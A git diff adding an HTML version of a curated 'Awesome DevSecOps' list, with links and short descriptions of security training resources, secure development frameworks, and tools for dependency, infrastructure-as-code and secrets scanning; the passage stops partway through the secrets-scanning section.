update lists
This commit is contained in:
799
html/devsecops.html
Normal file
799
html/devsecops.html
Normal file
@@ -0,0 +1,799 @@
|
||||
<figure>
|
||||
<img src="media/banner.png" alt="Awesome" />
|
||||
<figcaption aria-hidden="true">Awesome</figcaption>
|
||||
</figure>
|
||||
<p align="center">
|
||||
<a href="https://awesome.re">
|
||||
<img alt="Awesome" src="https://awesome.re/badge-flat.svg"> </a>
|
||||
</p>
|
||||
<hr/>
|
||||
<blockquote>
|
||||
<p>Curating the best DevSecOps resources and tooling.</p>
|
||||
</blockquote>
|
||||
<p><a
|
||||
href="https://www.rapid7.com/fundamentals/devsecops/">DevSecOps</a> is
|
||||
an extension of the <a
|
||||
href="https://www.atlassian.com/devops">DevOps</a> movement that aims to
|
||||
bring security practices into the development lifecycle through
|
||||
developer-centric security tooling and processes.</p>
|
||||
<p>Contributions welcome. Add links through pull requests or create an
|
||||
issue to start a discussion.</p>
|
||||
<!-- omit in toc -->
|
||||
<h2 id="contents">Contents</h2>
|
||||
<ul>
|
||||
<li><a href="#resources">Resources</a>
|
||||
<ul>
|
||||
<li><a href="#articles">Articles</a></li>
|
||||
<li><a href="#books">Books</a></li>
|
||||
<li><a href="#communities">Communities</a></li>
|
||||
<li><a href="#conferences">Conferences</a></li>
|
||||
<li><a href="#newsletters">Newsletters</a></li>
|
||||
<li><a href="#podcasts">Podcasts</a></li>
|
||||
<li><a href="#secure-development-guidelines">Secure Development
|
||||
Guidelines</a></li>
|
||||
<li><a href="#secure-development-lifecycle-framework">Secure Development
|
||||
Lifecycle Framework</a></li>
|
||||
<li><a href="#toolchains">Toolchains</a></li>
|
||||
<li><a href="#training">Training</a></li>
|
||||
<li><a href="#wikis">Wikis</a></li>
|
||||
</ul></li>
|
||||
<li><a href="#tools">Tools</a>
|
||||
<ul>
|
||||
<li><a href="#dependency-management">Dependency Management</a></li>
|
||||
<li><a href="#dynamic-analysis">Dynamic Analysis</a></li>
|
||||
<li><a href="#infrastructure-as-code-analysis">Infrastructure as Code
|
||||
Analysis</a></li>
|
||||
<li><a href="#intentionally-vulnerable-applications">Intentionally
|
||||
Vulnerable Applications</a></li>
|
||||
<li><a href="#monitoring">Monitoring</a></li>
|
||||
<li><a href="#secrets-management">Secrets Management</a></li>
|
||||
<li><a href="#secrets-scanning">Secrets Scanning</a></li>
|
||||
<li><a href="#static-analysis">Static Analysis</a></li>
|
||||
<li><a href="#supply-chain-security">Supply Chain Security</a></li>
|
||||
<li><a href="#threat-modelling">Threat Modelling</a></li>
|
||||
</ul></li>
|
||||
<li><a href="#related-lists">Related Lists</a></li>
|
||||
</ul>
|
||||
<h2 id="resources">Resources</h2>
|
||||
<h3 id="articles">Articles</h3>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://www.pagerduty.com/blog/security-training-at-pagerduty/">Our
|
||||
Approach to Employee Security Training</a> - <em>Pager Duty</em> -
|
||||
Guidelines to running security training within an organisation.</li>
|
||||
<li><a href="https://spacelift.io/blog/what-is-devsecops">DevSecOps:
|
||||
Making Security Central To Your DevOps Pipeline</a> - <em>Spacelift</em>
|
||||
- An article explains what DevSecOps aims to achieve, why it’s
|
||||
advantageous, and how the DevSecOps lifecycle looks.</li>
|
||||
</ul>
|
||||
<h3 id="books">Books</h3>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://www.wiley.com/en-gb/Alice+and+Bob+Learn+Application+Security-p-9781119687405">Alice
|
||||
and Bob Learn Application Security</a> - <em>Tanya Janca</em> - An
|
||||
accessible and thorough resource for anyone seeking to incorporate, from
|
||||
the beginning of the System Development Life Cycle, best security
|
||||
practices in software development.</li>
|
||||
</ul>
|
||||
<h3 id="communities">Communities</h3>
|
||||
<ul>
|
||||
<li><a href="https://www.devseccon.com/">DevSecCon</a> - <em>Snyk</em> -
|
||||
A community that runs conferences, a blog, a podcast and a Discord
|
||||
dedicated to DevSecOps.</li>
|
||||
<li><a href="https://tag-security.cncf.io/">TAG Security</a> - <em>Cloud
|
||||
Native Computing Foundation</em> - TAG Security facilitates
|
||||
collaboration to discover and produce resources that enable secure
|
||||
access, policy control, and safety for operators, administrators,
|
||||
developers, and end-users across the cloud native ecosystem.</li>
|
||||
</ul>
|
||||
<h3 id="conferences">Conferences</h3>
|
||||
<ul>
|
||||
<li><a href="https://appsecday.io/">AppSec Day</a> - <em>OWASP</em> - An
|
||||
Australian application security conference run by OWASP.</li>
|
||||
<li><a href="https://www.devseccon.com/">DevSecCon</a> - <em>Snyk</em> -
|
||||
A network of DevSecOps conferences run by Snyk.</li>
|
||||
</ul>
|
||||
<h3 id="newsletters">Newsletters</h3>
|
||||
<ul>
|
||||
<li><a href="https://shift-security-left.curated.co/">Shift Security
|
||||
Left</a> - <em>Cossack Labs</em> - A free biweekly newsletter for
|
||||
security-aware developers covering application security, secure
|
||||
architecture, DevSecOps, cryptography, incidents, etc. that can be
|
||||
useful for builders and (to a lesser extent) for breakers.</li>
|
||||
</ul>
|
||||
<h3 id="podcasts">Podcasts</h3>
|
||||
<ul>
|
||||
<li><a href="https://absoluteappsec.com/">Absolute AppSec</a> - <em>Seth
|
||||
Law & Ken Johnson</em> - Discussions about current events and
|
||||
specific topics related to application security.</li>
|
||||
<li><a href="https://podcast.securityjourney.com/">Application Security
|
||||
Podcast</a> - <em>Security Journey</em> - Interviews with industry
|
||||
experts about specific application security concepts.</li>
|
||||
<li><a href="https://blog.aquasec.com/devsecops-podcasts">BeerSecOps</a>
|
||||
- <em>Aqua Security</em> - Breaking down the silos of Dev, Sec and Ops,
|
||||
discussing topics that span these subject areas.</li>
|
||||
<li><a href="https://soundcloud.com/owasp-podcast">DevSecOps Podcast
|
||||
Series</a> - <em>OWASP</em> - Discussions with thought leaders and
|
||||
practitioners to integrate security into the development lifecycle.</li>
|
||||
<li><a
|
||||
href="https://www.mydevsecops.io/the-secure-developer-podcast">The
|
||||
Secure Developer</a> - <em>Snyk</em> - Discussion about security tools
|
||||
and best practices for software developers.</li>
|
||||
</ul>
|
||||
<h3 id="secure-development-guidelines">Secure Development
|
||||
Guidelines</h3>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://owasp.org/www-project-application-security-verification-standard/">Application
|
||||
Security Verification Standard</a> - <em>OWASP</em> - A framework of
|
||||
security requirements and controls to help developers design and develop
|
||||
secure web applications.</li>
|
||||
<li><a
|
||||
href="https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards">Coding
|
||||
Standards</a> - <em>CERT</em> - A collection of secure development
|
||||
standards for C, C++, Java and Android development.</li>
|
||||
<li><a
|
||||
href="https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf">Fundamental
|
||||
Practices for Secure Software Development</a> - <em>SAFECode</em> -
|
||||
Guidelines for implementing key secure development practices throughout
|
||||
the SDLC.</li>
|
||||
<li><a
|
||||
href="https://owasp.org/www-project-proactive-controls/">Proactive
|
||||
Controls</a> - <em>OWASP</em> - OWASP’s list of top ten controls that
|
||||
should be implemented in every software development project.</li>
|
||||
<li><a
|
||||
href="https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines">Secure
|
||||
Coding Guidelines</a> - <em>Mozilla</em> - A guideline containing
|
||||
specific secure development standards for secure web application
|
||||
development.</li>
|
||||
<li><a
|
||||
href="https://owasp.org/www-pdf-archive/OWASP_SCP_Quick_Reference_Guide_v2.pdf">Secure
|
||||
Coding Practices Quick Reference Guide</a> - <em>OWASP</em> - A
|
||||
checklist to verify that secure development standards have been
|
||||
followed.</li>
|
||||
</ul>
|
||||
<h3 id="secure-development-lifecycle-framework">Secure Development
|
||||
Lifecycle Framework</h3>
|
||||
<ul>
|
||||
<li><a href="https://www.bsimm.com/framework.html">Building Security In
|
||||
Maturity Model (BSIMM)</a> - <em>Synopsys</em> - A framework for
|
||||
software security created by observing and analysing data from leading
|
||||
software security initiatives.</li>
|
||||
<li><a
|
||||
href="https://www.microsoft.com/en-us/securityengineering/sdl/practices">Secure
|
||||
Development Lifecycle</a> - <em>Microsoft</em> - A collection of tools
|
||||
and practices that serve as a framework for the secure development
|
||||
lifecycle.</li>
|
||||
<li><a
|
||||
href="https://csrc.nist.gov/CSRC/media/Publications/white-paper/2019/06/07/mitigating-risk-of-software-vulnerabilities-with-ssdf/draft/documents/ssdf-for-mitigating-risk-of-software-vulns-draft.pdf">Secure
|
||||
Software Development Framework</a> - <em>NIST</em> - A framework
|
||||
consisting of practices, tasks and implementation examples for a secure
|
||||
development lifecycle.</li>
|
||||
<li><a href="https://github.com/OWASP/samm">Software Assurance Maturity
|
||||
Model</a> - <em>OWASP</em> - A framework to measure and improve the
|
||||
maturity of the secure development lifecycle.</li>
|
||||
</ul>
|
||||
<h3 id="toolchains">Toolchains</h3>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://www.sans.org/posters/cloud-security-devsecops-best-practices/">Cloud
|
||||
Security and DevSecOps Best Practices <em>and</em> Securing Web
|
||||
Application Technologies (SWAT) Checklist</a> - <em>SANS</em> - A poster
|
||||
containing the Securing Web Application Technologies (SWAT) Checklist,
|
||||
SANS Cloud Security Curriculum, Cloud Security Top 10, Top 12 Kubernetes
|
||||
Threats, and Secure DevOps Toolchain.</li>
|
||||
<li><a
|
||||
href="https://xebialabs.com/periodic-table-of-devops-tools/">Periodic
|
||||
Table of DevOps Tools</a> - <em>XebiaLabs</em> - A collection of
|
||||
DevSecOps tooling categorised by tool functionality.</li>
|
||||
</ul>
|
||||
<h3 id="training">Training</h3>
|
||||
<ul>
|
||||
<li><a href="https://github.com/duo-labs/appsec-education">Application
|
||||
Security Education</a> - <em>Duo Security</em> - Training materials
|
||||
created by the Duo application security team, including introductory and
|
||||
advanced training presentations and hands-on labs.</li>
|
||||
<li><a href="https://www.cybrary.it/">Cybrary</a> - <em>Cybrary</em> -
|
||||
Subscription based online courses with dedicated categories for
|
||||
cybersecurity and DevSecOps.</li>
|
||||
<li><a href="https://pentesterlab.com/">PentesterLab</a> -
|
||||
<em>PentesterLab</em> - Hands on labs to understand and exploit simple
|
||||
and advanced web vulnerabilities.</li>
|
||||
<li><a href="https://www.practical-devsecops.com">Practical
|
||||
DevSecOps</a> - <em>Practical DevSecOps</em> - Learn DevSecOps concepts,
|
||||
tools, and techniques from industry experts with practical DevSecOps
|
||||
using state of the art browser-based labs.</li>
|
||||
<li><a href="https://academy.safestack.io/">SafeStack</a> -
|
||||
<em>SafeStack</em> - Security training for software development teams,
|
||||
designed to be accessible to individuals and small teams as well as
|
||||
larger organisations.</li>
|
||||
<li><a href="https://www.securecodewarrior.com/">Secure Code Warrior</a>
|
||||
- <em>Secure Code Warrior</em> - Gamified and hands-on secure
|
||||
development training with support for courses, assessments and
|
||||
tournaments.</li>
|
||||
<li><a href="https://www.secureflag.com/platform.html">SecureFlag</a> -
|
||||
<em>OWASP</em> - Hands-on secure coding training for Developers and
|
||||
Build/Release Engineers.</li>
|
||||
<li><a href="https://sudo.pagerduty.com/for_engineers/">Security
|
||||
Training for Engineers</a> - <em>Pager Duty</em> - A presentation
|
||||
created and open-sourced by PagerDuty to provide security training to
|
||||
software engineers.</li>
|
||||
<li><a href="https://sudo.pagerduty.com/for_everyone/">Security Training
|
||||
for Everyone</a> - <em>Pager Duty</em> - A presentation created and
|
||||
open-sourced by PagerDuty to provide security training employees.</li>
|
||||
<li><a href="https://academy.semgrep.dev/">Semgrep Academy</a> -
|
||||
<em>Semgrep</em> - Free, on-demand courses covering topics including API
|
||||
security, secure coding and application security.<br />
|
||||
</li>
|
||||
<li><a href="https://portswigger.net/web-security">Web Security
|
||||
Academy</a> - <em>PortSwigger</em> - A set of materials and labs to
|
||||
learn and exploit common web vulnerabilities.</li>
|
||||
<li><a href="https://wehackpurple.com/">WeHackPuple</a> -
|
||||
<em>WeHackPurple</em> - Online courses that teach application security
|
||||
theory and hands-on technical lessons.</li>
|
||||
</ul>
|
||||
<h3 id="wikis">Wikis</h3>
|
||||
<ul>
|
||||
<li><a href="https://snyk.io/devsecops/">DevSecOps Hub</a> -
|
||||
<em>Snyk</em> - Introduction to key DevSecOps concepts, processes and
|
||||
technologies.</li>
|
||||
<li><a href="https://knowledge-base.secureflag.com/">SecureFlag
|
||||
Knowledge Base</a> - <em>OWASP</em> - A repository of information about
|
||||
software vulnerabilities and how to prevent them.</li>
|
||||
</ul>
|
||||
<h2 id="tools">Tools</h2>
|
||||
<h3 id="dependency-management">Dependency Management</h3>
|
||||
<p>Open source software packages can speed up the development process by
|
||||
allowing developers to implement functionality without having to write
|
||||
all of the code. However, with the open source code comes open source
|
||||
vulnerabilities. Dependency management tools help manage vulnerabilities
|
||||
in open source packages by identifying and updating packages with known
|
||||
vulnerabilities.</p>
|
||||
<ul>
|
||||
<li><a href="https://github.com/deepfence/ThreatMapper">Deepfence
|
||||
ThreatMapper</a> - Apache v2, powerful runtime vulnerability scanner for
|
||||
kubernetes, virtual machines and serverless.</li>
|
||||
<li><a href="https://dependabot.com/">Dependabot</a> - <em>GitHub</em> -
|
||||
Automatically scan GitHub repositories for vulnerabilities and create
|
||||
pull requests to merge in patched dependencies.</li>
|
||||
<li><a
|
||||
href="https://owasp.org/www-project-dependency-check/">Dependency-Check</a>
|
||||
- <em>OWASP</em> - Scans dependencies for publicly disclosed
|
||||
vulnerabilities using CLI or build server plugins.</li>
|
||||
<li><a href="https://dependencytrack.org/">Dependency-Track</a> -
|
||||
<em>OWASP</em> - Monitor the volume and severity of vulnerable
|
||||
dependencies across multiple projects over time.</li>
|
||||
<li><a href="https://jfrog.com/xray/">JFrog XRay</a> - <em>JFrog</em> -
|
||||
Security and compliance analysis for artifacts stored in JFrog
|
||||
Artifactory.</li>
|
||||
<li><a href="https://docs.npmjs.com/cli/audit">NPM Audit</a> -
|
||||
<em>NPM</em> - Vulnerable package auditing for node packages built into
|
||||
the npm CLI.</li>
|
||||
<li><a href="https://renovate.whitesourcesoftware.com/">Renovate</a> -
|
||||
<em>WhiteSource</em> - Automatically monitor and update software
|
||||
dependencies for multiple frameworks and languages using a CLI or git
|
||||
repository apps.</li>
|
||||
<li><a href="https://requires.io/">Requires.io</a> - <em>Olivier Mansion
|
||||
& Alexis Tabary</em> - Automated vulnerable dependency monitoring
|
||||
and upgrades for Python projects.</li>
|
||||
<li><a
|
||||
href="https://snyk.io/product/open-source-security-management/">Snyk
|
||||
Open Source</a> - <em>Snyk</em> - Automated vulnerable dependency
|
||||
monitoring and upgrades using Snyk’s dedicated vulnerability
|
||||
database.</li>
|
||||
</ul>
|
||||
<h3 id="dynamic-analysis">Dynamic Analysis</h3>
|
||||
<p>Dynamic Analysis Security Testing (DAST) is a form of black-box
|
||||
security testing where a security scanner interacts with a running
|
||||
instance of an application, emulating malicious activity to find common
|
||||
vulnerabilities. DAST tools are commonly used in the initial phases of a
|
||||
penetration test, and can find vulnerabilities such as cross-site
|
||||
scripting, SQL injection, cross-site request forgery and information
|
||||
disclosure.</p>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://github.com/imperva/automatic-api-attack-tool">Automatic
|
||||
API Attack Tool</a> - <em>Imperva</em> - Perform automated security
|
||||
scanning against an API based on an API specification.</li>
|
||||
<li><a href="https://portswigger.net/burp/enterprise">BurpSuite
|
||||
Enterprise Edition</a> - <em>PortSwigger</em> - BurpSuite’s web
|
||||
application vulnerability scanner used widely by penetration testers,
|
||||
modified with CI/CD integration and continuous monitoring over multiple
|
||||
web applications.</li>
|
||||
<li><a href="https://github.com/gauntlt/gauntlt">Gauntlt</a> -
|
||||
<em>Gauntlt</em> - A Behaviour Driven Development framework to run
|
||||
security scans using common security tools and test output, defined
|
||||
using Gherkin syntax.</li>
|
||||
<li><a href="https://github.com/spectralops/netz">Netz</a> -
|
||||
<em>Spectral</em> - Discover internet-wide misconfigurations, using
|
||||
zgrab2 and others.</li>
|
||||
<li><a href="https://github.com/microsoft/restler-fuzzer">RESTler</a> -
|
||||
<em>Microsoft</em> - A stateful RESTful API scanner based on
|
||||
peer-reviewed research papers.</li>
|
||||
<li><a href="https://github.com/ssllabs/ssllabs-scan">SSL Labs Scan</a>
|
||||
- <em>SSL Labs</em> - Automated scanning for SSL / TLS configuration
|
||||
issues.</li>
|
||||
<li><a href="https://github.com/zaproxy/zaproxy">Zed Attack Proxy
|
||||
(ZAP)</a> - <em>OWASP</em> - An open-source web application
|
||||
vulnerability scanner, including an API for CI/CD integration.</li>
|
||||
</ul>
|
||||
<h3 id="infrastructure-as-code-analysis">Infrastructure as Code
|
||||
Analysis</h3>
|
||||
<p>Infrastructure as Code allows applications to be deployed reliably to
|
||||
a consistent environment. This not only ensures that infrastructure is
|
||||
consistently hardened, but also provides an opportunity to statically
|
||||
and dynamically analyse infrastructure definitions for vulnerable
|
||||
dependencies, hard-coded secrets, insecure configuration and
|
||||
unintentional changes in security configuration. The following tools
|
||||
facilitate this analysis.</p>
|
||||
<h4 id="multi-platform">Multi-Platform</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/bridgecrewio/checkov">Checkov</a> -
|
||||
<em>Bridgecrew</em> - Scan Terraform, AWS CloudFormation and Kubernetes
|
||||
templates for insecure configuration.</li>
|
||||
<li><a href="https://github.com/Checkmarx/kics">KICS</a> -
|
||||
<em>Checkmarx</em> - Find security vulnerabilities, compliance issues,
|
||||
and infrastructure misconfigurations early in the development
|
||||
cycle.</li>
|
||||
<li><a
|
||||
href="https://spectralops.io/blog/spectral-launches-deepconfig-to-ensure-no-misconfiguration-at-all-layers-of-software/">Spectral
|
||||
DeepConfig</a> - <em>Spectral</em> - Find misconfiguration both in
|
||||
infrastructure as well as apps as early as commit time.</li>
|
||||
<li><a href="https://github.com/accurics/terrascan">Terrascan</a> -
|
||||
<em>Accurics</em> - Detect compliance and security violations across
|
||||
Infrastructure as Code to mitigate risk before provisioning cloud native
|
||||
infrastructure.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="cloud-formation">Cloud Formation</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/stelligent/cfn_nag">Cfn Nag</a> -
|
||||
<em>Stelligent</em> - Scan AWS CloudFormation templates for insecure
|
||||
configuration.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="containers">Containers</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/quay/clair">Clair</a> - <em>Red Hat</em>
|
||||
- Scan App Container and Docker containers for publicly disclosed
|
||||
vulnerabilities.</li>
|
||||
<li><a href="https://github.com/eliasgranderubio/dagda/">Dagda</a> -
|
||||
<em>Elías Grande</em> - Compares OS and software dependency versions
|
||||
installed in Docker containers with public vulnerability databases, and
|
||||
also performs virus scanning.</li>
|
||||
<li><a
|
||||
href="https://github.com/docker/docker-bench-security">Docker-Bench-Security</a>
|
||||
- <em>Docker</em> - The Docker Bench for Security is a script that
|
||||
checks for dozens of common best-practices around deploying Docker
|
||||
containers in production.</li>
|
||||
<li><a href="https://github.com/anchore/grype/">Grype</a> -
|
||||
<em>Anchore</em> - An easy-to-integrate open source vulnerability
|
||||
scanning tool for container images and filesystems.</li>
|
||||
<li><a href="https://github.com/hadolint/hadolint">Hadolint</a> -
|
||||
<em>Hadolint</em> - Checks a Dockerfile against known rules and
|
||||
validates inline bash code in RUN statements.</li>
|
||||
<li><a
|
||||
href="https://snyk.io/product/container-vulnerability-management/">Snyk
|
||||
Container</a> - <em>Snyk</em> - Scan Docker and Kubernetes applications
|
||||
for security vulnerabilities during CI/CD or via continuous
|
||||
monitoring.</li>
|
||||
<li><a href="https://github.com/aquasecurity/trivy">Trivy</a> - <em>Aqua
|
||||
Security</em> - Simple and comprehensive vulnerability scanner for
|
||||
containers.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="terraform">Terraform</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/fugue/regula">Regula</a> -
|
||||
<em>Fugue</em> - Evaluate Terraform infrastructure-as-code for potential
|
||||
security misconfigurations and compliance violations prior to
|
||||
deployment.</li>
|
||||
<li><a href="https://terraform-compliance.com/">Terraform Compliance</a>
|
||||
- <em>terraform-compliance</em> - A lightweight, security and compliance
|
||||
focused test framework against terraform to enable negative testing
|
||||
capability for your infrastructure-as-code.</li>
|
||||
<li><a href="https://github.com/liamg/tfsec">Tfsec</a> - <em>Liam
|
||||
Galvin</em> - Scan Terraform templates for security misconfiguration and
|
||||
noncompliance with AWS, Azure and GCP security best practice.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="kubernetes">Kubernetes</h4>
|
||||
<ul>
|
||||
<li><a href="https://kubescape.io/">Kubescape</a> - <em>Cloud Native
|
||||
Computing Foundation</em> - An open-source Kubernetes security platform
|
||||
for your IDE, CI/CD pipelines, and clusters.</li>
|
||||
<li><a href="https://github.com/zegl/kube-score">Kube-Score</a> -
|
||||
<em>Gustav Westling</em> - Scan Kubernetes object definitions for
|
||||
security and performance misconfiguration.</li>
|
||||
<li><a href="https://github.com/controlplaneio/kubectl-kubesec">Kubectrl
|
||||
Kubesec</a> - <em>ControlPlane</em> - Plugin for kubesec.io to perform
|
||||
security risk analysis for Kubernetes resources.</li>
|
||||
</ul>
|
||||
<h4 id="ansible">Ansible</h4>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://github.com/ansible-community/ansible-lint">Ansible-Lint</a>
|
||||
- <em>Ansible Community</em> - Checks playbooks for practices and
|
||||
behaviour that could potentially be improved. As a community backed
|
||||
project ansible-lint supports only the last two major versions of
|
||||
Ansible.</li>
|
||||
</ul>
|
||||
<h3 id="intentionally-vulnerable-applications">Intentionally Vulnerable
|
||||
Applications</h3>
|
||||
<p>Intentionally vulnerable applications are often useful when
|
||||
developing security tests and tooling to provide a place you can run
|
||||
tests and make sure they fail correctly. These applications can also be
|
||||
useful for understanding how common vulnerabilities are introduced into
|
||||
applications and let you practice your skills at exploiting them.</p>
|
||||
<ul>
|
||||
<li><a href="https://github.com/chromium/badssl.com">Bad SSL</a> -
|
||||
<em>The Chromium Project</em> - A container running a number of
|
||||
webservers with poor SSL / TLS configuration. Useful for testing
|
||||
tooling.</li>
|
||||
<li><a href="https://github.com/bridgecrewio/cfngoat">Cfngoat</a> -
|
||||
<em>Bridgecrew</em> - Cloud Formation templates for creating stacks of
|
||||
intentionally insecure services in AWS. Ideal for testing the Cloud
|
||||
Formation Infrastructure as Code Analysis tools above.</li>
|
||||
<li><a href="https://github.com/cider-security-research/cicd-goat">CI/CD
|
||||
Goat</a> - <em>Cider Security</em> - A deliberately vulnerable CI/CD
|
||||
environment. Learn CI/CD security through multiple challenges.</li>
|
||||
<li><a href="http://www.dvwa.co.uk/">Damn Vulnerable Web App</a> -
|
||||
<em>Ryan Dewhurst</em> - A web application that provides a safe
|
||||
environment to understand and exploit common web vulnerabilities.</li>
|
||||
<li><a href="https://github.com/bkimminich/juice-shop">Juice Shop</a> -
|
||||
<em>OWASP</em> - A web application containing the OWASP Top 10 security
|
||||
vulnerabilities and more.</li>
|
||||
<li><a href="https://github.com/madhuakula/kubernetes-goat">Kubernetes
|
||||
Goat</a> - <em>Madhu Akula</em> - Intentionally vulnerable cluster
|
||||
environment to learn and practice Kubernetes security.</li>
|
||||
<li><a href="https://github.com/OWASP/NodeGoat">NodeGoat</a> -
|
||||
<em>OWASP</em> - A Node.js web application that demonstrates and
|
||||
provides ways to address common security vulnerabilities.</li>
|
||||
<li><a href="https://pentest-ground.com/">Pentest-Ground</a> -
|
||||
<em>Pentest-Tools.com</em> - Pentest-Ground is a free playground with
|
||||
deliberately vulnerable web applications and network services.</li>
|
||||
<li><a href="https://github.com/bridgecrewio/terragoat">Terragoat</a> -
|
||||
<em>Bridgecrew</em> - Terraform templates for creating stacks of
|
||||
intentionally insecure services in AWS, Azure and GCP. Ideal for testing
|
||||
the Terraform Infrastructure as Code Analysis tools above.</li>
|
||||
<li><a
|
||||
href="https://owasp.org/www-project-vulnerable-web-applications-directory">Vulnerable
|
||||
Web Apps Directory</a> - <em>OWASP</em> - A collection of vulnerable web
|
||||
applications for learning purposes.</li>
|
||||
<li><a href="https://github.com/OWASP/wrongsecrets">WrongSecrets</a> -
|
||||
<em>OWASP</em> - Vulnerable app with examples showing how to not use
|
||||
secrets</li>
|
||||
</ul>
|
||||
<h3 id="monitoring">Monitoring</h3>
|
||||
<p>It’s not enough to test and harden our software in the lead up to a
|
||||
release. We must also monitor our production software for usage,
|
||||
performance and errors to capture malicious behavior and potential
|
||||
security flaws that we may need to respond to or address. A wide variety
|
||||
of tools are available to monitor different aspects of production
|
||||
software and infrastructure.</p>
|
||||
<ul>
|
||||
<li><a href="https://csper.io/report-uri">Csper</a> - <em>Csper</em> - A
|
||||
set of Content Security Policy tools that can test policies, monitor CSP
|
||||
reports and provide metrics and alerts.</li>
|
||||
<li><a href="https://streamdal.com">Streamdal</a> - <em>Streamdal</em> -
|
||||
Embed privacy controls in your application code to detect and monitor
|
||||
PII as it enters and leaves your systems, preventing it from reaching
|
||||
unintended databases, data streams, or pipelines.</li>
|
||||
</ul>
|
||||
<h3 id="secrets-management">Secrets Management</h3>
|
||||
<p>The software we write needs to use secrets (passwords, API keys,
|
||||
certificates, database connection strings) to access resources, yet we
|
||||
cannot store secrets within the codebase as this leaves them vulnerable
|
||||
to compromise. Secret management tools provide a means to securely
|
||||
store, access and manage secrets.</p>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://docs.ansible.com/ansible/latest/user_guide/vault.html">Ansible
|
||||
Vault</a> - <em>Ansible</em> - Securely store secrets within Ansible
|
||||
pipelines.</li>
|
||||
<li><a href="https://aws.amazon.com/kms/">AWS Key Management Service
|
||||
(KMS)</a> - <em>Amazon AWS</em> - Create and manage cryptographic keys
|
||||
in AWS.</li>
|
||||
<li><a href="https://aws.amazon.com/secrets-manager/">AWS Secrets
|
||||
Manager</a> - <em>Amazon AWS</em> - Securely store retrievable
|
||||
application secrets in AWS.</li>
|
||||
<li><a
|
||||
href="https://azure.microsoft.com/en-au/services/key-vault/">Azure Key
|
||||
Vault</a> - <em>Microsoft Azure</em> - Securely store secrets within
|
||||
Azure.</li>
|
||||
<li><a href="https://github.com/StackExchange/blackbox">BlackBox</a> -
|
||||
<em>StackExchange</em> - Encrypt credentials within your code
|
||||
repository.</li>
|
||||
<li><a href="https://github.com/chef/chef-vault">Chef Vault</a> -
|
||||
<em>Chef</em> - Securely store secrets within Chef.</li>
|
||||
<li><a href="https://github.com/fugue/credstash">CredStash</a> -
|
||||
<em>Fugue</em> - Securely store secrets within AWS using KMS and
|
||||
DynamoDB.</li>
|
||||
<li><a
|
||||
href="https://www.cyberark.com/products/privileged-account-security-solution/application-access-manager/">CyberArk
|
||||
Application Access Manager</a> - <em>CyberArk</em> - Secrets management
|
||||
for applications including secret rotation and auditing.</li>
|
||||
<li><a href="https://docs.docker.com/engine/swarm/secrets/">Docker
|
||||
Secrets</a> - <em>Docker</em> - Store and manage access to secrets
|
||||
within a Docker swarm.</li>
|
||||
<li><a href="https://github.com/awslabs/git-secrets">Git Secrets</a> -
|
||||
<em>Amazon AWS</em> - Scan git repositories for secrets committed within
|
||||
code or commit messages.</li>
|
||||
<li><a href="https://github.com/gopasspw/gopass">Gopass</a> -
|
||||
<em>Gopass</em> - Password manager for teams relying on Git and gpg.
|
||||
Manages secrets in encrypted files and repositories.</li>
|
||||
<li><a href="https://cloud.google.com/kms">Google Cloud Key Management
|
||||
Service (KMS)</a> - <em>Google Cloud Platform</em> - Securely store
|
||||
secrets within GCP.</li>
|
||||
<li><a href="https://www.vaultproject.io/">HashiCorp Vault</a> -
|
||||
<em>HashiCorp</em> - Securely store secrets via UI, CLI or HTTP
|
||||
API.</li>
|
||||
<li><a href="https://github.com/SpectralOps/keyscope">Keyscope</a> -
|
||||
<em>Spectral</em> - Keyscope is an open source key and secret workflow
|
||||
tool (validation, invalidation, etc.) built in Rust.</li>
|
||||
<li><a href="https://github.com/pinterest/knox">Pinterest Knox</a> -
|
||||
<em>Pinterest</em> - Securely store, rotate and audit secrets.</li>
|
||||
<li><a href="https://github.com/mozilla/sops">Secrets Operations
|
||||
(SOPS)</a> - <em>Mozilla</em> - Encrypt keys stored within YAML, JSON,
|
||||
ENV, INI and BINARY files.</li>
|
||||
<li><a href="https://github.com/spectralops/teller">Teller</a> -
|
||||
<em>Spectral</em> - A secrets management tool for developers - never
|
||||
leave your command line for secrets.</li>
|
||||
</ul>
|
||||
<h3 id="secrets-scanning">Secrets Scanning</h3>
|
||||
<p>Source control is not a secure place to store secrets such as
|
||||
credentials, API keys or tokens, even if the repo is private. Secrets
|
||||
scanning tools can scan and monitor git repositories and pull-requests
|
||||
for secrets, and can be used to prevent secrets from being committed, or
|
||||
to find and remove secrets that have already been committed to source
|
||||
control.</p>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://secdevtools.azurewebsites.net/helpcredscan.html">CredScan</a>
|
||||
- <em>Microsoft</em> - A credential scanning tool that can be run as a
|
||||
task in Azure DevOps pipelines.</li>
|
||||
<li><a href="https://github.com/Yelp/detect-secrets">Detect Secrets</a>
|
||||
- <em>Yelp</em> - An aptly named module for (surprise, surprise)
|
||||
detecting secrets within a code base.</li>
|
||||
<li><a href="https://www.gitguardian.com/">GitGuardian</a> -
|
||||
<em>GitGuardian</em> - A web-based solution that scans and monitors
|
||||
public and private git repositories for secrets.</li>
|
||||
<li><a href="https://github.com/zricethezav/gitleaks">Gitleaks</a> -
|
||||
<em>Zachary Rice</em> - Gitleaks is a SAST tool for detecting hardcoded
|
||||
secrets like passwords, api keys, and tokens in git repositories.</li>
|
||||
<li><a href="https://github.com/awslabs/git-secrets">git-secrets</a> -
|
||||
